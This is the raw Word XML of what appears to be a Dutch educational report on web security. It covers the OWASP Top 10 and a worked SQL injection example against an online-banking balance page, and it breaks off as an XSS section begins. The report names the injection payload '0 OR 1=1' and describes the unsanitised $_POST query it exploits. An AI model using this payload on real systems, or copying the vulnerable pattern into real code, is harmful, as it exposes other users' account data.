            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="604A07D4" w14:textId="77777777" w:rsidR="00576CC1" w:rsidRDefault="00576CC1">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A1EE6A" w14:textId="6C3CC3F7" w:rsidR="00B429FB" w:rsidRDefault="002E6339">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253312000" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7C8633A4" wp14:editId="392A063C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-198755</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>252095</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6130925" cy="7079615"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:wrapSquare wrapText="bothSides"/>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XSS.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId146">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6130925" cy="7079615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="008B11D4" w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253314048" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="716CE1CF" wp14:editId="2D83C2FA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-895985</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1008110</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="868" name="Rectangle 86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D220F" id="Rectangle 868" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.55pt;margin-top:-79.35pt;width:25pt;height:1031.7pt;z-index:-2500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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F442250" w14:textId="0D0F23C8" w:rsidR="00B429FB" w:rsidRDefault="00B429FB"/>
    <w:p w14:paraId="26BDEB79" w14:textId="77777777" w:rsidR="00C132BF" w:rsidRDefault="00C132BF">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E77CE6" w14:textId="40C779D6" w:rsidR="008B11D4" w:rsidRDefault="00C132BF">
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253325312" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3F99CB74" wp14:editId="5B00FA48">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-896081</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-898186</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="878" name="Rectangle 87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0CC33" id="Rectangle 878" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.55pt;margin-top:-70.65pt;width:25pt;height:1031.7pt;z-index:-2499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rVy5ICAACxBQAADgAAAGRycy9lMm9Eb2MueG1srFRRT9swEH6ftP9g+X0kKbCy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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253323264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="28B0D56C" wp14:editId="22F865E1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>325755</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="6603365"/>
            <wp:effectExtent l="25400" t="25400" r="34290" b="26035"/>
            <wp:wrapSquare wrapText="bothSides"/>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65BD3">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEB6A55" w14:textId="7D779481" w:rsidR="00B429FB" w:rsidRDefault="00C132BF">
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253321216" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6F89244D" wp14:editId="5F1B4370">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-903996</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-900682</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="876" name="Rectangle 87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6A10" id="Rectangle 876" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.2pt;margin-top:-70.85pt;width:25pt;height:1031.7pt;z-index:-2499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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002E6339">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253319168" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3D1F6794" wp14:editId="4394DA98">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-197041</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6251575" cy="6186805"/>
            <wp:effectExtent l="0" t="0" r="0" b="10795"/>
            <wp:wrapSquare wrapText="bothSides"/>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SQL.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId147">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6251575" cy="6186805"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00B429FB">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7057B2" w14:textId="72BC235F" w:rsidR="00A65BD3" w:rsidRDefault="00B429FB">
      <w:pPr>
        <w:rPr>
          <w:smallCaps/>
          <w:spacing w:val="5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253261824" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="69159319" wp14:editId="1935A3BD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-897890</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-902448</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="797" name="Rectangle 7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FA605" id="Rectangle 797" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.7pt;margin-top:-71pt;width:25pt;height:1031.7pt;z-index:-2500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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="1818E9A2" w14:textId="1627B138" w:rsidR="00A666A2" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>OWASP Definities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="0EC7B7FB" w14:textId="1E8C33BB" w:rsidR="00A666A2" w:rsidRPr="009131FF" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009131FF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>A1 Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE9E0A4" w14:textId="3E7AD490" w:rsidR="00A666A2" w:rsidRPr="00C5361E" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">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0D5BBFDC" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRPr="00A60186" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>A2 Broken Authentication and Session Management (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DC0AF4" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">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7B9CF6AC" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRPr="0013587D" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013587D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>A3 Cross Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB021FD" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">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3314CA57" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRPr="00A60186" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>A4 Insecure Direct Object References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA346DE" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">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75E295A0" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRPr="00A60186" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>A5 Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1093194F" w14:textId="49681A1F" w:rsidR="00A666A2" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">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w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">aandacht besteden aan het correct configureren van hun systemen. Zoals eerder geschreven zijn er een variatie van acties die kunnen leiden tot misconfiguratie. Zo kan de ontwikkelaar per ongeluk de debugger aan laten </w:t>
      </w:r>
      <w:r w:rsidR="008D40E9" w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253288448" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="39BEE6E9" wp14:editId="71AFB1DE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-895211</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1009354</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="856" name="Rectangle 8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DA452" id="Rectangle 856" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.5pt;margin-top:-79.45pt;width:25pt;height:1031.7pt;z-index:-2500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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>staan waar hackers gebruik van kunnen maken door de error berichten uit te lezen om andere kwetsbaarheden te ontdekken ook kunnen mappen in het systeem verkeerde permissie rechten hebben ontvangen waardoor iedereen toegang kan verkrijgen tot deze mappen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763E9AAD" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRPr="00A60186" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>A6 Sensitive Data Exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC0DAC7" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">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3395EEEB" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRPr="00A60186" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>A7 Missing Function Level Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FB730F" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">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5E79B713" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRPr="00A60186" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>A8 Cross Site Request Forgery Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E714FAE" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:r w:rsidRPr="001D4F2E">
        <w:t>Cross Site Request Forgery Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0AC91C" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRPr="001D4F2E" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">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24D21D9A" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRPr="00A60186" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>A9 Using Components with Known Vulnerabilities Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC65C09" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">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0197EEF5" w14:textId="77777777" w:rsidR="00876608" w:rsidRDefault="00876608" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CB6D2B2" w14:textId="77777777" w:rsidR="00876608" w:rsidRDefault="00876608" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73C59CDC" w14:textId="66DA669C" w:rsidR="00A666A2" w:rsidRPr="00A60186" w:rsidRDefault="00876608" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253286400" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2A8512FD" wp14:editId="0C89980F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-896620</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1008650</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="853" name="Rectangle 8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E4AFD" id="Rectangle 853" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.6pt;margin-top:-79.35pt;width:25pt;height:1031.7pt;z-index:-2500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F/J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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A666A2" w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>A10 Unvalidated Redirects and Forwards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FD211A" w14:textId="60245BC8" w:rsidR="00CF3AE8" w:rsidRDefault="00A666A2">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148" w:history="1">
        <w:r w:rsidRPr="0028560A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>www.testwebsite.nl/redirect.php?id=http://testlink.nl</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CF3AE8">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C56253E" w14:textId="0BB1E591" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="000E3238">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253274112" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3634C096" wp14:editId="75486C00">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-896081</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1016887</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="849" name="Rectangle 8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2FF97" id="Rectangle 849" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.55pt;margin-top:-80pt;width:25pt;height:1031.7pt;z-index:-2500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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00CF3AE8">
        <w:t>SQL injectie voorbeeld</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609727B0" w14:textId="0A172BA1" w:rsidR="00CF3AE8" w:rsidRPr="000E3B41" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E3B41">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Meer data teruggeven dan verwacht</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DA6B26" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t>In dit voorbeeld wilt de ontwikkelaar het accountnummer en balans tonen van de gebruiker die op dat moment is ingelogd. Om de gebruikersdata op te kunnen vragen wordt de gebruikers ID opgestuurd als argument.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534D4CF9" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33BF2E2F" wp14:editId="485B93B8">
            <wp:extent cx="5760720" cy="2218055"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="842"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9">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578EC0D3" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t>Figuur 3.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A884CBA" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">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Pr="00FC4851">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>https://onlinebankeren/balans?userId=487</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F42886" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t>De SQL-query die uitgevoerd zou worden zal dan zijn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C39C49" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">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394F5CE2" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t>Deze SQL-query zal door de database uitgevoerd worden en het accountnummer en balans van eindgebruiker 487 zal op de website getoond worden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AB2511" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRPr="006B346C" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B346C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploiteren van </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>kwetsbaarheid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B9C449" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t xml:space="preserve">Het exploiteren van dit voorbeeld is niet moeilijk, de aanvaller/hacker hoeft alleen maar te weten dat de input van de eindgebruikers niet schoon wordt gemaakt (sanitize) van verkeerde data. De globale variabele </w:t>
      </w:r>
      <w:r w:rsidRPr="005969BB">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>$_POST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  op regel 3 (figuur 3.3) wordt zonder voorzorgmaatregelingen er in geplaatst en uitgevoerd. Dit betekent dat de aanvaller/hacker SQL-injecties kan uitvoeren. Een veelgebruikte SQL-injectie is: 0 OR 1=1, wat resulteert naar de SQL query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ABE676" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">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2EB4EA5A" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r w:rsidRPr="005D1BBF">
        <w:t xml:space="preserve">Als deze SQL-query wordt uitgevoerd dan zal het alle accountgegevens teruggeven die in de database opgeslagen staan. </w:t>
      </w:r>
      <w:r>
        <w:t>De aanvaller/hacker heeft nu het accountnummer en balansgegevens van alle gebruikers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8F3BFC" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t>Voorbeeld van een XSS-aanval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFD22B7" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t xml:space="preserve">De anatomie van een XSS-aanval bestaat uit een webapplicatie waarop ongecodeerde en niet gevalideerde gebruikers input geplaats kan worden en een webbrowser die het de programmeertaal javascript kan interpreteren en runnen. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C299D2C" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
